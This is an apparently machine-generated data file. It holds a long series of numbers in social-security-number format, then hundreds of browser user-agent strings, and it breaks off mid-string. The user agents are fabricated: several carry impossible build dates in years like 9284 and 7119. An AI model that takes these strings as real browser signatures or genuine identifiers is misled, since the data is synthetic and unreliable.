+637-25-9904 +116-49-6625 +221-54-5748 +335-71-9449 +749-49-6796 +336-10-1446 +606-06-3812 +225-69-5297 +443-79-2731 +733-09-0209 +348-23-0997 +693-39-3141 +656-41-1826 +691-55-3115 +218-42-0947 +327-11-6124 +711-97-1040 +427-04-4999 +274-73-8070 +501-61-6429 +415-45-7640 +349-12-4280 +449-80-2160 +187-42-0649 +163-07-5984 +234-62-4116 +014-25-8404 +116-16-5213 +743-62-8476 +646-62-6719 +772-37-1671 +730-52-2689 +433-78-0788 +071-17-3384 +709-98-9934 +180-13-5136 +692-90-1282 +770-75-5941 +159-93-5760 +575-64-9738 +541-20-4068 +849-79-1913 +771-13-3369 +822-81-8981 +704-15-9341 +200-53-0099 +761-63-0587 +538-76-8076 +700-06-5636 +840-30-7576 +783-38-2168 +066-57-9383 +738-10-2709 +872-02-8321 +347-89-7008 +641-96-8022 +750-66-2459 +714-11-1851 +566-50-9825 +492-48-5633 +211-02-1168 +626-36-5958 +104-37-5971 +280-07-0184 +054-22-9112 +123-85-3404 +019-62-2196 +426-57-3017 +415-44-9971 +120-38-0870 +489-03-7285 +890-28-0834 +660-09-4890 +761-30-4508 +591-31-8791 +548-71-6642 +868-83-4818 +539-93-6965 +790-55-4658 +364-89-1718 +391-85-9466 +848-32-6731 +398-94-5860 +797-70-7410 +021-73-0992 +095-74-2896 +776-33-6557 +833-07-2357 +745-18-4088 +482-07-3509 +330-73-1586 +093-20-5842 +441-26-7626 +347-34-7573 +086-11-5090 +466-85-3382 +833-34-3585 +019-66-3263 +340-13-7905 +644-18-3284 +303-67-9886 +449-83-4904 +344-23-3666 +203-93-6745 +812-60-3450 +646-43-4152 +124-54-2844 +887-77-7386 +003-77-4008 +274-16-0466 +574-83-5753 +129-41-2397 +481-25-9234 +786-56-9767 +633-08-2802 +121-82-7864 +846-93-8949 +338-51-0723 +385-39-1644 +361-57-1947 +780-77-5629 +070-72-3080 +891-57-5873 +331-48-9601 +790-17-8730 +183-63-2584 +843-93-5711 +533-48-3161 +758-51-1282 +155-82-0151 +155-53-9482 +234-55-4658 +764-06-9505 +334-36-0403 +893-62-9661 +487-50-7337 +407-43-7960 +607-46-5623 +899-77-7951 +776-51-5997 +748-14-7484 +230-74-4227 +792-88-3554 +358-75-5754 +882-86-3281 +042-76-6900 +350-01-6939 +685-94-9057 +893-65-4826 +742-87-3662 +533-86-4157 +684-15-6502 +402-96-8023 +797-83-7247 +285-03-2613 +521-20-5638 +508-65-2858 +497-70-8264 +388-46-4987 +358-45-7046 +004-74-0508 +377-69-3477 +212-74-3964 +273-73-6711 +547-01-7903 +141-75-5201 +841-45-0114 +147-53-1114 +482-27-9216 +470-50-0542 +282-66-1898 +820-73-0557 +633-56-2297 +086-12-1707 +777-77-1740 +730-77-5426 +388-30-4524 +105-35-4526 +033-60-5161 +205-24-1024 +556-72-7034 +535-30-8154 +166-51-2116 +457-45-9678 +486-56-7153 +005-23-7944 +765-37-4570 +231-14-5533 +352-67-0848 +392-35-5238 +755-67-3580 +298-16-3895 +365-52-7824 +170-08-5082 +222-51-6079 +018-37-8711 +624-49-0444 +097-74-8199 +146-76-7029 +629-79-6233 +373-73-7769 +773-41-3193 +034-19-9573 +394-14-4773 +012-05-4788 +654-05-3035 +653-95-0055 +140-34-4075 +085-28-6910 +473-01-2198 +721-40-1628 +124-07-3940 +707-91-1261 +115-45-7002 +712-18-4102 +027-96-3079 +034-12-6725 +716-44-9960 +864-54-0231 +376-84-8849 +005-69-3399 +025-66-6713 +711-23-5597 +717-94-3240 +067-15-9992 +088-92-0513 +059-18-1660 +298-58-8323 +814-63-2745 +280-23-9870 +448-21-9674 +626-60-9030 +319-02-6694 +888-81-0082 +338-50-9987 +417-50-6487 +288-37-8921 +471-79-0388 +179-99-4366 +120-52-4214 +398-73-8958 +675-55-9354 +361-12-9700 +231-74-5380 +745-06-1093 +776-58-7609 +731-87-8671 +520-72-2587 +274-37-5725 +818-64-2306 +276-82-6049 +175-23-9479 +129-38-0973 +114-61-4511 +415-91-3911 +552-32-0791 +791-20-7122 +332-32-4731 +478-01-0416 +423-73-9979 +222-97-9585 +499-42-1186 +690-83-7903 +106-44-2377 +802-25-7882 +110-71-9044 +343-84-3009 +796-62-8274 +013-05-0682 +065-20-7781 +397-92-5107 +093-44-6843 +403-41-0082 +672-47-9806 +190-44-1586 +013-85-5460 +524-51-8235 +125-90-6882 +597-38-3843 +184-33-0270 +336-99-2952 +678-36-5168 +054-75-7708 +863-22-1320 +252-88-5883 +415-41-1008 +466-29-2899 +309-45-4148 +846-28-0218 +014-06-1059 +023-34-1996 +457-40-0236 +718-31-9052 +627-63-3865 +444-81-1956 +229-63-3896 +082-89-3590 +574-67-9093 +770-11-1083 +812-27-5248 +243-47-5034 +079-91-1046 +212-28-1859 +863-65-7920 +579-29-5686 +594-47-9125 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/533.1 (KHTML, like Gecko) Chrome/60.0.800.0 Safari/533.1 +Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/532.1 (KHTML, like Gecko) CriOS/25.0.884.0 Mobile/23P755 Safari/532.1 +Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/535.33.2 (KHTML, like Gecko) Version/5.0 Safari/535.33.2 +Mozilla/5.0 (Windows; U; Windows CE) AppleWebKit/531.27.5 (KHTML, like Gecko) Version/4.1 Safari/531.27.5 +Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.0; Trident/3.1) +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_10_2 rv:5.0; hu-HU) AppleWebKit/534.23.2 (KHTML, like Gecko) Version/5.0 Safari/534.23.2 +Opera/9.26.(Windows NT 5.1; oc-FR) Presto/2.9.189 Version/11.00 +Mozilla/5.0 (Android 3.1; Mobile; rv:36.0) Gecko/36.0 Firefox/36.0 +Mozilla/5.0 (Macintosh; PPC Mac OS X 10_10_7 rv:5.0; zh-HK) AppleWebKit/533.43.4 (KHTML, like Gecko) Version/5.0 Safari/533.43.4 +Mozilla/5.0 (X11; Linux i686) AppleWebKit/533.1 (KHTML, like Gecko) Chrome/56.0.802.0 Safari/533.1 +Mozilla/5.0 (Windows NT 5.2) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/28.0.893.0 Safari/532.0 +Opera/8.95.(X11; Linux i686; rw-RW) Presto/2.9.163 Version/10.00 +Mozilla/5.0 (Windows NT 5.0; ku-TR; rv:1.9.2.20) Gecko/9284-07-25 11:47:36.674622 Firefox/10.0 +Mozilla/5.0 (compatible; MSIE 7.0; Windows 95; Trident/3.1) +Opera/9.14.(Windows 98; ln-CD) Presto/2.9.178 Version/12.00 +Mozilla/5.0 (Linux; Android 5.1) AppleWebKit/533.1 (KHTML, like Gecko) Chrome/22.0.830.0 Safari/533.1 +Mozilla/5.0 (Linux; Android 4.2) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/43.0.817.0 Safari/534.1 +Mozilla/5.0 (Macintosh; PPC Mac OS X 10_7_8 rv:5.0; ve-ZA) AppleWebKit/533.5.3 (KHTML, like Gecko) Version/5.1 Safari/533.5.3 +Opera/8.32.(Windows NT 6.1; ko-KR) Presto/2.9.186 Version/10.00 +Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 6.2; Trident/5.0) +Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/3.1) +Mozilla/5.0 (compatible; MSIE 9.0; Windows 98; Trident/3.0) +Mozilla/5.0 (Android 1.1; Mobile; rv:56.0) Gecko/56.0 Firefox/56.0 +Mozilla/5.0 (Linux; Android 4.3) AppleWebKit/536.0 (KHTML, like Gecko) Chrome/54.0.817.0 Safari/536.0 +Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2 like Mac OS X; wo-SN) AppleWebKit/531.14.7 (KHTML, like Gecko) Version/3.0.5 Mobile/8B115 Safari/6531.14.7 +Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/3.0) +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_10_1) AppleWebKit/533.1 (KHTML, like Gecko) Chrome/24.0.827.0 Safari/533.1 +Opera/9.70.(X11; Linux x86_64; lij-IT) Presto/2.9.185 Version/10.00 +Mozilla/5.0 (compatible; MSIE 5.0; Windows 98; Win 9x 4.90; Trident/4.0) +Opera/8.95.(X11; Linux x86_64; gv-GB) Presto/2.9.187 Version/10.00 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_12_4) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/45.0.812.0 Safari/531.0 +Mozilla/5.0 (Windows NT 5.01; my-MM; rv:1.9.2.20) Gecko/6124-10-10 00:00:04.011719 Firefox/13.0 +Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 10.0; Trident/3.1) +Mozilla/5.0 (Windows NT 4.0) AppleWebKit/531.1 (KHTML, like Gecko) Chrome/51.0.858.0 Safari/531.1 +Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/2162-02-18 06:57:45.079076 Firefox/13.0 +Mozilla/5.0 (iPad; CPU iPad OS 14_2 like Mac OS X) AppleWebKit/534.1 (KHTML, like Gecko) CriOS/58.0.813.0 Mobile/46F616 Safari/534.1 +Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/533.1 (KHTML, like Gecko) CriOS/39.0.808.0 Mobile/21N789 Safari/533.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0 rv:6.0; tg-TJ) AppleWebKit/531.40.6 (KHTML, like Gecko) Version/4.1 Safari/531.40.6 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/533.0 (KHTML, like Gecko) Chrome/63.0.874.0 Safari/533.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_10_4) AppleWebKit/536.1 (KHTML, like Gecko) Chrome/30.0.857.0 Safari/536.1 +Mozilla/5.0 (iPod; U; CPU iPhone OS 3_2 like Mac OS X; hsb-DE) AppleWebKit/534.45.1 (KHTML, like Gecko) Version/4.0.5 Mobile/8B112 Safari/6534.45.1 +Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/533.13.6 (KHTML, like Gecko) Version/5.0.2 Safari/533.13.6 +Opera/8.21.(Windows 98; Win 9x 4.90; yue-HK) Presto/2.9.178 Version/11.00 +Opera/8.77.(X11; Linux i686; mni-IN) Presto/2.9.165 Version/11.00 +Opera/9.92.(Windows NT 6.2; hsb-DE) Presto/2.9.169 Version/11.00 +Opera/9.98.(Windows 95; niu-NZ) Presto/2.9.181 Version/10.00 +Mozilla/5.0 (Windows; U; Windows NT 10.0) AppleWebKit/534.9.1 (KHTML, like Gecko) Version/4.0.4 Safari/534.9.1 +Mozilla/5.0 (Windows; U; Windows CE) AppleWebKit/534.20.7 (KHTML, like Gecko) Version/5.0.4 Safari/534.20.7 +Mozilla/5.0 (iPhone; CPU iPhone OS 4_2_1 like Mac OS X) AppleWebKit/535.0 (KHTML, like Gecko) FxiOS/14.1y4034.0 Mobile/96K243 Safari/535.0 +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.0; Trident/5.0) +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_7_8 rv:5.0; gez-ET) AppleWebKit/533.36.1 (KHTML, like Gecko) Version/4.0.1 Safari/533.36.1 +Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/3480-09-21 01:12:35.822815 Firefox/3.6.7 +Mozilla/5.0 (iPhone; CPU iPhone OS 4_2_1 like Mac OS X) AppleWebKit/535.0 (KHTML, like Gecko) CriOS/44.0.880.0 Mobile/00E956 Safari/535.0 +Opera/8.80.(X11; Linux x86_64; cs-CZ) Presto/2.9.171 Version/11.00 +Mozilla/5.0 (iPad; CPU iPad OS 9_3_5 like Mac OS X) AppleWebKit/531.1 (KHTML, like Gecko) CriOS/24.0.823.0 Mobile/26I614 Safari/531.1 +Mozilla/5.0 (Android 5.0.2; Mobile; rv:29.0) Gecko/29.0 Firefox/29.0 +Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.0; Trident/5.0) +Mozilla/5.0 (Macintosh; PPC Mac OS X 10_5_0 rv:5.0; the-NP) AppleWebKit/532.10.6 (KHTML, like Gecko) Version/5.0.4 Safari/532.10.6 +Mozilla/5.0 (iPad; CPU iPad OS 10_3_3 like Mac OS X) AppleWebKit/536.2 (KHTML, like Gecko) CriOS/32.0.833.0 Mobile/00H906 Safari/536.2 +Mozilla/5.0 (Android 4.0.4; Mobile; rv:42.0) Gecko/42.0 Firefox/42.0 +Opera/8.20.(Windows CE; sc-IT) Presto/2.9.177 Version/11.00 +Mozilla/5.0 (Linux; Android 4.4.2) AppleWebKit/531.1 (KHTML, like Gecko) Chrome/28.0.820.0 Safari/531.1 +Mozilla/5.0 (Windows; U; Windows 98) AppleWebKit/532.2.1 (KHTML, like Gecko) Version/5.1 Safari/532.2.1 +Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_4 like Mac OS X) AppleWebKit/534.1 (KHTML, like Gecko) CriOS/63.0.835.0 Mobile/37H278 Safari/534.1 +Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/3.0) +Mozilla/5.0 (iPad; CPU iPad OS 14_2 like Mac OS X) AppleWebKit/532.2 (KHTML, like Gecko) FxiOS/14.3n0675.0 Mobile/97G997 Safari/532.2 +Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/4427-11-29 05:30:50.959335 Firefox/3.8 +Mozilla/5.0 (iPod; U; CPU iPhone OS 4_3 like Mac OS X; tl-PH) AppleWebKit/532.43.5 (KHTML, like Gecko) Version/4.0.5 Mobile/8B112 Safari/6532.43.5 +Mozilla/5.0 (iPod; U; CPU iPhone OS 3_1 like Mac OS X; ce-RU) AppleWebKit/532.47.5 (KHTML, like Gecko) Version/3.0.5 Mobile/8B115 Safari/6532.47.5 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4; rv:1.9.4.20) Gecko/7119-09-28 16:22:27.893768 Firefox/3.8 +Mozilla/5.0 (Windows CE) AppleWebKit/535.0 (KHTML, like Gecko) Chrome/62.0.896.0 Safari/535.0 +Mozilla/5.0 (Android 2.3.4; Mobile; rv:29.0) Gecko/29.0 Firefox/29.0 +Opera/9.70.(X11; Linux x86_64; nl-NL) Presto/2.9.174 Version/11.00 +Opera/8.88.(X11; Linux i686; yo-NG) Presto/2.9.183 Version/10.00 +Mozilla/5.0 (iPhone; CPU iPhone OS 3_1_3 like Mac OS X) AppleWebKit/536.1 (KHTML, like Gecko) CriOS/17.0.823.0 Mobile/11V222 Safari/536.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4 rv:3.0; zu-ZA) AppleWebKit/534.3.1 (KHTML, like Gecko) Version/4.0 Safari/534.3.1 +Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/5.1) +Mozilla/5.0 (iPad; CPU iPad OS 9_3_6 like Mac OS X) AppleWebKit/536.0 (KHTML, like Gecko) FxiOS/17.9u8917.0 Mobile/81Z370 Safari/536.0 +Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 5.1; Trident/3.1) +Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/533.7.2 (KHTML, like Gecko) Version/5.1 Safari/533.7.2 +Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/25.0.882.0 Safari/535.2 +Opera/9.80.(X11; Linux x86_64; brx-IN) Presto/2.9.182 Version/12.00 +Mozilla/5.0 (Linux; Android 7.1) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/30.0.832.0 Safari/534.1 +Mozilla/5.0 (iPad; CPU iPad OS 12_4_8 like Mac OS X) AppleWebKit/533.2 (KHTML, like Gecko) FxiOS/12.0c4212.0 Mobile/99I367 Safari/533.2 +Mozilla/5.0 (iPad; CPU iPad OS 5_1_1 like Mac OS X) AppleWebKit/534.2 (KHTML, like Gecko) FxiOS/11.2p5912.0 Mobile/66U681 Safari/534.2 +Mozilla/5.0 (iPod; U; CPU iPhone OS 3_3 like Mac OS X; pa-PK) AppleWebKit/532.44.4 (KHTML, like Gecko) Version/3.0.5 Mobile/8B115 Safari/6532.44.4 +Opera/8.94.(X11; Linux x86_64; om-KE) Presto/2.9.178 Version/12.00 +Opera/8.65.(X11; Linux i686; dz-BT) Presto/2.9.169 Version/12.00 +Opera/9.90.(X11; Linux x86_64; oc-FR) Presto/2.9.170 Version/12.00 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; rv:1.9.2.20) Gecko/9624-11-06 23:09:19.354309 Firefox/5.0 +Mozilla/5.0 (iPad; CPU iPad OS 9_3_5 like Mac OS X) AppleWebKit/532.0 (KHTML, like Gecko) FxiOS/11.1h3408.0 Mobile/32D542 Safari/532.0 +Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2 like Mac OS X; tk-TM) AppleWebKit/532.30.1 (KHTML, like Gecko) Version/4.0.5 Mobile/8B118 Safari/6532.30.1 +Mozilla/5.0 (Linux; Android 8.0.0) AppleWebKit/533.1 (KHTML, like Gecko) Chrome/59.0.870.0 Safari/533.1 +Mozilla/5.0 (Macintosh; PPC Mac OS X 10_8_0 rv:2.0; ja-JP) AppleWebKit/532.5.4 (KHTML, like Gecko) Version/4.0.4 Safari/532.5.4 +Opera/8.22.(X11; Linux i686; om-KE) Presto/2.9.161 Version/11.00 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3 rv:6.0; yue-HK) AppleWebKit/534.40.7 (KHTML, like Gecko) Version/5.0.4 Safari/534.40.7 +Mozilla/5.0 (Windows NT 5.2; fi-FI; rv:1.9.0.20) Gecko/2571-01-25 22:25:10.568577 Firefox/3.6.16 +Mozilla/5.0 (Linux; Android 4.2) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/13.0.808.0 Safari/533.2 +Mozilla/5.0 (Windows; U; Windows NT 4.0) AppleWebKit/532.12.4 (KHTML, like Gecko) Version/4.0.4 Safari/532.12.4 +Opera/9.36.(X11; Linux i686; hy-AM) Presto/2.9.174 Version/12.00 +Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/3.1) +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/533.0 (KHTML, like Gecko) Chrome/24.0.815.0 Safari/533.0 +Mozilla/5.0 (compatible; MSIE 9.0; Windows CE; Trident/5.0) +Mozilla/5.0 (Windows NT 5.01; pap-AN; rv:1.9.0.20) Gecko/4343-12-09 08:40:51.337708 Firefox/3.8 +Mozilla/5.0 (Android 2.3; Mobile; rv:26.0) Gecko/26.0 Firefox/26.0 +Opera/8.35.(Windows NT 6.0; eu-FR) Presto/2.9.164 Version/12.00 +Opera/9.48.(Windows 95; hne-IN) Presto/2.9.189 Version/10.00 +Mozilla/5.0 (compatible; MSIE 5.0; Windows 95; Trident/5.1) +Opera/8.82.(X11; Linux i686; bho-IN) Presto/2.9.168 Version/12.00 +Mozilla/5.0 (compatible; MSIE 6.0; Windows 95; Trident/5.1) +Mozilla/5.0 (Macintosh; PPC Mac OS X 10_5_9) AppleWebKit/533.0 (KHTML, like Gecko) Chrome/24.0.884.0 Safari/533.0 +Mozilla/5.0 (Macintosh; PPC Mac OS X 10_11_3; rv:1.9.4.20) Gecko/9149-08-30 17:38:43.750702 Firefox/3.6.5 +Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 4.0; Trident/5.0) +Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/3.0) +Opera/9.13.(X11; Linux x86_64; cmn-TW) Presto/2.9.188 Version/12.00 +Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0) +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5 rv:6.0; ln-CD) AppleWebKit/534.27.7 (KHTML, like Gecko) Version/4.1 Safari/534.27.7 +Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.1) +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.1) +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_3 rv:5.0; crh-UA) AppleWebKit/533.26.6 (KHTML, like Gecko) Version/4.1 Safari/533.26.6 +Opera/9.36.(Windows 98; ht-HT) Presto/2.9.190 Version/11.00 +Mozilla/5.0 (compatible; MSIE 5.0; Windows 98; Win 9x 4.90; Trident/5.0) +Mozilla/5.0 (compatible; MSIE 7.0; Windows 95; Trident/5.0) +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.1) +Opera/9.85.(Windows 95; unm-US) Presto/2.9.164 Version/11.00 +Mozilla/5.0 (iPod; U; CPU iPhone OS 3_1 like Mac OS X; nb-NO) AppleWebKit/531.10.6 (KHTML, like Gecko) Version/3.0.5 Mobile/8B117 Safari/6531.10.6 +Mozilla/5.0 (compatible; MSIE 7.0; Windows 98; Trident/4.0) +Opera/9.83.(X11; Linux x86_64; bhb-IN) Presto/2.9.169 Version/11.00 +Mozilla/5.0 (X11; Linux i686) AppleWebKit/536.0 (KHTML, like Gecko) Chrome/61.0.893.0 Safari/536.0 +Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2 like Mac OS X; yo-NG) AppleWebKit/532.46.7 (KHTML, like Gecko) Version/4.0.5 Mobile/8B111 Safari/6532.46.7 +Opera/8.61.(X11; Linux x86_64; the-NP) Presto/2.9.168 Version/11.00 +Mozilla/5.0 (Windows NT 4.0) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/21.0.833.0 Safari/534.2 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/50.0.886.0 Safari/535.2 +Mozilla/5.0 (Android 2.0.1; Mobile; rv:13.0) Gecko/13.0 Firefox/13.0 +Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.0; Trident/3.0) +Opera/8.78.(Windows CE; hi-IN) Presto/2.9.175 Version/11.00 +Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/3.1) +Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2 like Mac OS X; apn-IN) AppleWebKit/531.26.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.26.2 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_9; rv:1.9.3.20) Gecko/2768-01-31 11:40:20.743393 Firefox/5.0 +Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/534.21.3 (KHTML, like Gecko) Version/5.0.1 Safari/534.21.3 +Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 5.01; Trident/5.0) +Mozilla/5.0 (Windows; U; Windows NT 4.0) AppleWebKit/533.31.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.31.4 +Opera/9.21.(X11; Linux x86_64; yi-US) Presto/2.9.183 Version/12.00 +Mozilla/5.0 (Windows; U; Windows 95) AppleWebKit/535.11.6 (KHTML, like Gecko) Version/4.1 Safari/535.11.6 +Mozilla/5.0 (compatible; MSIE 8.0; Windows 95; Trident/3.1) +Mozilla/5.0 (iPhone; CPU iPhone OS 14_2_1 like Mac OS X) AppleWebKit/536.1 (KHTML, like Gecko) CriOS/46.0.863.0 Mobile/17I771 Safari/536.1 +Mozilla/5.0 (Windows CE) AppleWebKit/533.0 (KHTML, like Gecko) Chrome/18.0.805.0 Safari/533.0 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_10_4; rv:1.9.5.20) Gecko/2493-07-16 01:33:55.867313 Firefox/15.0 +Mozilla/5.0 (Linux; Android 3.2) AppleWebKit/531.1 (KHTML, like Gecko) Chrome/20.0.870.0 Safari/531.1 +Mozilla/5.0 (compatible; MSIE 6.0; Windows 98; Trident/3.0) +Mozilla/5.0 (Windows NT 6.0; hy-AM; rv:1.9.0.20) Gecko/7331-05-19 12:39:01.434998 Firefox/8.0 +Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 5.1; Trident/5.1) +Mozilla/5.0 (iPhone; CPU iPhone OS 14_2 like Mac OS X) AppleWebKit/531.1 (KHTML, like Gecko) FxiOS/13.8w1672.0 Mobile/35V042 Safari/531.1 +Mozilla/5.0 (Windows; U; Windows NT 5.01) AppleWebKit/535.42.7 (KHTML, like Gecko) Version/4.1 Safari/535.42.7 +Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/4938-03-11 20:51:19.039215 Firefox/3.6.4 +Mozilla/5.0 (Linux; Android 1.6) AppleWebKit/534.0 (KHTML, like Gecko) Chrome/13.0.851.0 Safari/534.0 +Opera/8.30.(Windows NT 5.2; om-KE) Presto/2.9.185 Version/10.00 +Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/3.0) +Mozilla/5.0 (iPad; CPU iPad OS 14_2 like Mac OS X) AppleWebKit/535.2 (KHTML, like Gecko) CriOS/41.0.855.0 Mobile/20X281 Safari/535.2 +Mozilla/5.0 (Android 2.2.3; Mobile; rv:5.0) Gecko/5.0 Firefox/5.0 +Mozilla/5.0 (iPhone; CPU iPhone OS 3_1_3 like Mac OS X) AppleWebKit/535.1 (KHTML, like Gecko) CriOS/33.0.878.0 Mobile/88G354 Safari/535.1 +Opera/8.98.(Windows NT 5.1; yue-HK) Presto/2.9.182 Version/12.00 +Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 6.1; Trident/5.0) +Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/534.25.4 (KHTML, like Gecko) Version/4.0.4 Safari/534.25.4 +Opera/9.39.(X11; Linux i686; pt-PT) Presto/2.9.184 Version/10.00 +Mozilla/5.0 (Android 3.2; Mobile; rv:64.0) Gecko/64.0 Firefox/64.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_10_1) AppleWebKit/533.0 (KHTML, like Gecko) Chrome/38.0.856.0 Safari/533.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_12_7) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/33.0.825.0 Safari/533.2 +Opera/9.88.(X11; Linux x86_64; af-ZA) Presto/2.9.177 Version/10.00 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_2 rv:5.0; tcy-IN) AppleWebKit/534.36.4 (KHTML, like Gecko) Version/4.0.5 Safari/534.36.4 +Mozilla/5.0 (Windows CE; ak-GH; rv:1.9.1.20) Gecko/6518-11-26 20:04:56.305695 Firefox/3.8 +Mozilla/5.0 (Android 4.0.4; Mobile; rv:18.0) Gecko/18.0 Firefox/18.0 +Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/5.1) +Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/3.0) +Opera/8.47.(Windows 95; nan-TW) Presto/2.9.161 Version/12.00 +Mozilla/5.0 (iPod; U; CPU iPhone OS 3_1 like Mac OS X; ug-CN) AppleWebKit/534.40.3 (KHTML, like Gecko) Version/3.0.5 Mobile/8B111 Safari/6534.40.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_11_4; rv:1.9.2.20) Gecko/9649-05-24 05:55:39.378937 Firefox/4.0 +Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2 like Mac OS X; mai-IN) AppleWebKit/533.5.7 (KHTML, like Gecko) Version/4.0.5 Mobile/8B111 Safari/6533.5.7 +Mozilla/5.0 (Android 3.2.2; Mobile; rv:18.0) Gecko/18.0 Firefox/18.0 +Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.01; Trident/5.0) +Opera/8.53.(Windows NT 5.1; crh-UA) Presto/2.9.183 Version/11.00 +Opera/9.86.(X11; Linux i686; tk-TM) Presto/2.9.182 Version/10.00 +Opera/9.27.(Windows NT 6.0; bn-BD) Presto/2.9.188 Version/11.00 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3 rv:3.0; pt-PT) AppleWebKit/535.26.6 (KHTML, like Gecko) Version/5.1 Safari/535.26.6 +Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/8988-10-26 02:45:06.484314 Firefox/3.6.5 +Opera/8.60.(Windows NT 6.0; lo-LA) Presto/2.9.182 Version/10.00 +Mozilla/5.0 (compatible; MSIE 6.0; Windows 98; Trident/5.1) +Mozilla/5.0 (Android 3.0; Mobile; rv:11.0) Gecko/11.0 Firefox/11.0 +Mozilla/5.0 (Windows NT 6.1; doi-IN; rv:1.9.2.20) Gecko/7221-05-20 08:53:54.547791 Firefox/7.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5 rv:2.0; dv-MV) AppleWebKit/533.17.5 (KHTML, like Gecko) Version/4.0.5 Safari/533.17.5 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_1) AppleWebKit/535.0 (KHTML, like Gecko) Chrome/45.0.822.0 Safari/535.0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/53.0.815.0 Safari/534.2 +Opera/9.22.(X11; Linux x86_64; nan-TW) Presto/2.9.186 Version/11.00 +Mozilla/5.0 (Windows NT 4.0) AppleWebKit/531.1 (KHTML, like Gecko) Chrome/31.0.804.0 Safari/531.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3 rv:3.0; byn-ER) AppleWebKit/531.3.1 (KHTML, like Gecko) Version/4.0.4 Safari/531.3.1 +Mozilla/5.0 (iPad; CPU iPad OS 7_1_2 like Mac OS X) AppleWebKit/536.2 (KHTML, like Gecko) CriOS/26.0.818.0 Mobile/05P359 Safari/536.2 +Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_3 like Mac OS X) AppleWebKit/534.1 (KHTML, like Gecko) 